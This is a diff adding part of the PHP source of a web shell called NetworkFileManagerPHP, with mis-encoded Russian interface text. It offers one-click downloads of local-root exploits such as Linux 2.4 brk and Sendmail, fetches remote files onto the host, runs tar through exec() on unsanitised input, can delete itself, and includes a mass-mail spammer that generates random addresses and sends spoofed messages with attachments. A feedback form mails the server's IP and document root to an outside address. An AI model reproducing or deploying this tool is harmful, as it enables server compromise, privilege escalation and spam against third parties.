+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.*(ôàéë çàïóñêà <u>brk</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+ <input type='hidden' name='file2' value='$private[1]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>Ôàéë 1</u></b> (ôàéë çàïóñêà <u>$private[2]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+ <input type='hidden' name='file2' value='$private[2]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>Ôàéë 2</u></b> (ôàéë çàïóñêà <u>$private[3]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+ <input type='hidden' name='file2' value='$private[3]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (ôàéë çàïóñêà <u>$private[4]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+ <input type='hidden' name='file2' value='$private[4]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[5]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+ <input type='hidden' name='file2' value='$private[5]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+   echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (ôàéë çàïóñêà <u>$private[6]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+ <input type='hidden' name='file2' value='$private[6]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+    echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[7]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+ <input type='hidden' name='file2' value='$private[7]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+     echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (ôàéë çàïóñêà <u>$private[8]</u> )</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+ <input type='hidden' name='file2' value='$private[8]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+}
+
+
+# ñîçäàíèå íîâîé äåğèêòîğèè
+function newdir($dir) {
+ global $tm,$nd;
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü äåğèêòîğèş:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Cîçäàòü' class=button1 $style_button></td></tr></form></table>");
+}
+
+function cdir($dir) {
+ global $newd,$tm;
+ $fullpath = $dir."/".$newd;
+ if (file_exists($fullpath)) @rmdir($fullpath);
+ if (@mkdir($fullpath,0777)) {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèğåêòîğèÿ ñîçäàíà.</font></center></td></tr></table>";
+ } else {
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Îøèáêà â ñîçäàíèè äåğèêòîğèè.</font></center></td></tr></table>";
+ }
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+// ñîçäàíèå äååêğèòîğèè Files äëÿ çàãğóçêè ôàéëîâ
+function downfiles() {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+$st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Ïóòü: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+print("</TABLE> ");
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà:</b></td></tr>
+ <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP ïóòü äî ôàéëà:</td>
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+ </tr>
+  <tr>
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà</td>
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+ </tr>
+  <tr>
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr></td>
+ 
+ 
+ </tr></form></table>";
+
+}
+
+# óäàëåíèå äåğèêòîğèè 
+function deldir() {
+ global $dd,$tm;
+ $fullpath = $tm."/".$dd;
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Äèğåêòîğèÿ óäàëåíà.</font></center></td></tr></table>";
+ rmdir($fullpath);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# àğõèâàöèÿ äèğåêòîğèè 
+function arhiv() {
+ global $tar,$tm,$pass;
+ $fullpath = $tm."/".$tar;
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Äåğèêòîğèÿ <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."óïàêîâàíà â ôàéë <u>$pass.tar.gz</u></font></center></td></tr></table>";
+ 
+}
+
+function down($dir) {
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+ ignore_user_abort(1);
+ set_time_limit(0);
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Çàãğóçêà ôàéëîâ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>×àñòåíüêî ñëó÷àåòñÿ, ÷òî íà ñåğâåğàõ ãäå óñòàíîâëåí <b>NFM</b> íå ğàáîòàåò <b>wget</b>, à ôàéë çàãğóçèòü îé êàê õî÷åòñÿ, òàêèì îáğàçîì ñ ïîìîùüş ïğîñòûõ ôóíêöèé âû ñìîæåòå çàãğóçèòü ëşáîé ôàéë íà ñâîé õîñòèíã â ïàïêó, ãäå çàëèò NFM ëèáî äğóãóş êàêóş âû âûáåğåòå (ñì.<b>Ïóòü</b>).( ğàáîòàåò íå íà âñåõ õîñòèíãàõ)</blockquote></td></tr>
+</table>";
+
+if (!isset($status)) downfiles(); 
+
+else 
+{
+
+$data = @implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+@fputs($fp, $data); 
+$ok = @fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãğóçèëè: <b>ôàéë <u>$file2</u> ğàçìåğîì</b> (".$sizef."êÁ) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Îøèáêà çàãğóçêè ôàéëà</b></font></center></td></tr></table>"; 
+} 
+} 
+}
+
+# îòïğàâêà ïî÷òû
+function mailsystem() {
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+ 
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Âîïğîñû è ïîæåëàíèÿ ïî ñêğèïòó NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>
+<blockquote>
+Â ïğîöåññå ğàáîòû ñî ñêğèïòîì NFM ó âàñ ìîãóò âîçíèêíóòü âîïğîñû è íîâûå ïğåäëîæåíèÿ ïî óëó÷øåíèş èëè äîáàâëåíèş ôóíêöèé â NFM, âñå âàøè ïğåäëîæåíèÿ áóäóò ğàññìîòğåíû è áóäóò ğåàëèçîâàíû â äàëüíåéøèõ âåğñèÿõ NFM.
+</blockquote></td></tr>
+</table>";
+ 
+ if (!isset($status)) echo "$form";
+ else {
+  $email_to ="duyt@yandex.ru";
+  $subject = "NetworkFileManagerPHP  ($name)";
+  $headers = "From: $email";
+
+  $info = "---==== Ñîîáùåíèå îò ($name)====---\n\n";
+  $info .= "Name:\t$name\n";
+  $info .= "Email:\t$email\n";
+  $info .= "What?:\n\t$pole\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $send_to = "$email_to";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Âàøå ñîîáùåíèå îòïğàâëåíî.</font></center></td></tr></table><br>";
+ }
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óíèêàëüíûé ñïàìåğ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Òåïåğü âàì íå íóæíî ïîêóïàòü ñïàìëèñòû, NFM ñàì â ñîñòîÿíèè ñãåíåğèòü ëşáóş áàçó, âàëèäíîñòü êîòîğîé áóäåò 50-60% </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>Ãåíåğàòîğ email:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;Äàííûé ñïàìåğ ğàçáèò íà äâà ıòàïà: <br>
+ &nbsp;<b>1.</b> Ãåíåğàöèÿ email ïî óæå âëîæåííûì äîìåíàì â ñêğèïò èëè ãåíåğàöèÿ email ïî óêàçàííîìó âàìè äîìåíó. Âûáîğ êîëëè÷åñòâà ãåíåğèğîâàíûõ ïèñåì ( óáåäèòåëüíàÿ ïğîñüáà ãåíåğèğîâàòü íå áîëüøå <u><i>10 000</i></u> )<br>
+ &nbsp;<b>2.</b> Óêàçàíèå íåîáõîäèìûõ äàííûõ äëÿ ñïàìà</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;Åñëè <b>checked</b> òî äîìåíû ïî äåôîëòó, åñëè íå <b>checked</b> òî âàø äîìåí.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Ñêîëüêî email ãåíåğèòü:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Câîé äîìåí:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Ãåíåğèòü' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+// ñîãëàñíûå
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// ãëàñíûå
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// öèôğû
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// ñîãëàñíûå ñ ãëàñíûìè
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "ïóñòî";
+exit;
+}
+$file="email.txt"; 
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+  
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+   
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+  
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+   
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " Íå íàéäåí  ôàéë <b>\"".$address."\"</b> !<br>";
+  }
+  
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  Ñãåíåğåííî âñåãî <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Ãëàâíûå íàñòğîéêè ñïàìåğà</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Îò êîãî ïèñüìî:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êóäà îòâåò:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Èíòåğâàë îòïğàâêè (ñåê):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Òåìà ñîîáùåíèÿ:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Òåêñò ïèñüìà:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ôàéë:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='filess' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Ãåíåğèòü' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+function del() {
+global $PHP_SELF;
+$file_to_delete = basename("$PHP_SELF"); 
+@chmod("$file_to_delete", 0777); 
+if (@unlink("$file_to_delete") < 0){
+echo "ïóñòî";
+exit;
+}
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óäàëåíèå NFM</b></font></b></td></tr>
+</table>";
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $filess, $chislo, $action;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Îòïğàâêà ïèñåì ñ çàäàíûìè îïöèÿìè</b></font></b></td></tr>
+</table>";
+
+	
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Îò êîãî ïèñüìî>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êóäà îòâåò>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåğâàë îòïğàâêè>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "÷òî-òî íå òàê";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>Îòêğûâàåì ôàéë <b>\"".$address."\"</b> ... <br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> íàéäåí...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> îòêğûò äëÿ ÷òåíèÿ...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó îòêğûòü äëÿ ÷òåíèÿ...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "íå ìîãó íàéòè ôàéëà \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Íà÷èíàåì ÷òåíèå èç ôàéëà <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+	  
+  if ($filess) {
+	$content = fread(fopen($filess,"r"),filesize($filess));
+		$content = chunk_split(base64_encode($content));
+		$name = basename($filess);
+   } else {
+   $content ='';
+   }
+      $boundary = uniqid("NextPart_");
+	    
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filess \nContent-disposition: inline; filename=$filess \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+		
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+	  
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Îòïğàâëÿåì ïèñüìî íà <b>\"".$recipient."\"</b>...îòïğàâëåíî ";
+        
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>Íå êîğğåêòíûé email, ñîîáùåíèå íå îòïğàâëåíî !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+             
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Îòïğàâëÿåì ïèñüìî íà <b>\"".$otvet."\"</b> äëÿ ïğîâåğêè";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " îòïğàâëåíî... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>íå îòïğàâëåíî...</td></tr> </table>";
+        }
+      } else {
